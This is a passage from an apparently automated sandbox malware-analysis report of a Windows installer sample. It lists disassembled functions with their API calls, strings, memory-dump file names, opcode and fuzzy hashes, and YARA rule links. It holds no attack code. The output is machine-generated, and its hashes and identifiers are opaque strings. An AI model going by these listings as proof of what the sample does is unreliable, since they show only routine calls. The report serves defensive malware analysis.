                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                                                    • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                    • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                    • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F26161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F261635
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F26163C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F261650
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(!&o,00000000), ref: 6F261657
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261660
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                    • String ID: !&o
                                                                                                                                                                                                                    • API String ID: 1148316912-201577036
                                                                                                                                                                                                                    • Opcode ID: 46168316b1e15ff5245c0779b6aa0c8f298d9c2582afaedea53613211152ea56
                                                                                                                                                                                                                    • Instruction ID: 6b278b2d0421b4f26e8103c6dba690ffda643fc4f29256981bfb7ea8fd719b37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46168316b1e15ff5245c0779b6aa0c8f298d9c2582afaedea53613211152ea56
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF01C722065387BDA2016E68C4CDABBE9CEF8B2F5B114211F66892190C6619C11DBF1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                    • MulDiv.KERNEL32(000B35D3,00000064,000B35D7), ref: 00402E3C
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                    • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                    • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F262569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F26121B: GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F262657
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F26268C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                                                    • Opcode ID: 3cbf68ee6d803ab0120c7ee41b672ba510699786e4665d290bf0430585e75bef
                                                                                                                                                                                                                    • Instruction ID: 9732de44b6cc5da34ed96a39fa5b9504173bef1b9455cf53f3517c9ad82ed048
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cbf68ee6d803ab0120c7ee41b672ba510699786e4665d290bf0430585e75bef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A3104B110855AEFCF188F68C998C3A77B6FF873153108669F541879E0C730A8A5CF51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                                                    • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                    • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp$C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll
                                                                                                                                                                                                                    • API String ID: 3109718747-2929397095
                                                                                                                                                                                                                    • Opcode ID: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                                                    • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F262394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2624D6
                                                                                                                                                                                                                      • Part of subcall function 6F26122C: lstrcpynW.KERNEL32(00000000,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F26123C
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6F26245C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F262477
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                                                                                                    • Opcode ID: 9706cd176f530de5e0ca20216721cc6f4d477c1c635a7862713a1a6319a1a89f
                                                                                                                                                                                                                    • Instruction ID: cddff6bc482745921a821bc3733bdaec2af800f7d8ed8e90f81bace9b09bc669
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9706cd176f530de5e0ca20216721cc6f4d477c1c635a7862713a1a6319a1a89f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41ADF0008709EFDB14DF28D844A6677B8FB4A725B10895EE446879C1EB74A4D4CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                                                    • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                    • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
